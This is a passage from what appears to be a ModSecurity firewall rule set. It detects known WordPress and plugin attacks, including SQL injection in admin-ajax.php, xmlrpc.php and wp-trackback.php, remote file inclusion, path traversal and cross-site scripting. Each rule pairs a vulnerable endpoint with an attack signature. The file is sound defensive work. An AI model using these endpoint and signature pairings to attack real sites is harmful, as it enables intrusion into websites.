"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004016) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004016,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004403) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php SELECT SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004403,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php SELECT',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004404) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UNION SELECT SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004404,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UNION SELECT',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004405) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php INSERT SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004405,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php INSERT',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004406) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php DELETE SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004406,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php DELETE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php ASCII SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004407,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php ASCII',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004408) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004408,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004654) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php SELECT SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004654,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004655) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UNION SELECT SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004655,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php INSERT SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004656,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004657) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php DELETE SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004657,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004658) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004658,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004659,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005657) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005657,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005658) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005658,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005659,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005660,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005661,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005662) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005662,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005865) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005865,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005866) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005866,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005867) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005867,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005868) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005868,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005869) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005869,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005870) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005870,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2008725) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Newsletter Plugin newsletter Parameter SQL Injection SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008725,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Newsletter Plugin newsletter Parameter SQL Injection',tag:'web-application-attack'" SecRule ARGS:newsletter "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Newsletter Plugin newsletter Parameter SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2009010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure SecRule REQUEST_LINE "@contains /books/getConfig.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009010,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure',tag:'web-application-attack',tag:'bugtraq,32966'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule QUERY_STRING|REQUEST_BODY "@contains book_id=" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:(\.\.\/){1,})" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2010473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt SecRule REQUEST_LINE "@contains /js/wptable-tinymce.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010473,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ABSPATH "(?i:ABSPATH\s*=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2010728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress wp-admin/admin.php Module Configuration Security Bypass Attempt SecRule REQUEST_LINE "@contains /wp-admin/admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010728,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress wp-admin/admin.php Module Configuration Security Bypass Attempt',tag:'web-application-attack',tag:'cve,2009-2334'" SecRule QUERY_STRING|REQUEST_BODY "@contains page=" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Fwp\x2Dadmin\x2Fadmin\x2Ephp.+page\x3D(\x2Fcollapsing\x2Darchives\x2Foptions\x2Etxt|akismet\x2Freadme\x2Etxt|related\x2Dways\x2Dto\x2Dtake\x2Daction\x2Foptions\x2Ephp|wp\x2Dsecurity\x2Dscan\x2Fsecurityscan\x2Ephp))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress wp-admin/admin.php Module Configuration Security Bypass Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011006) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/nextgen-gallery/xml/media-rss.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011006,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-1186'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mode "(?i:(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011044) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011044,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:postid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter SELECT FROM SQL Injection 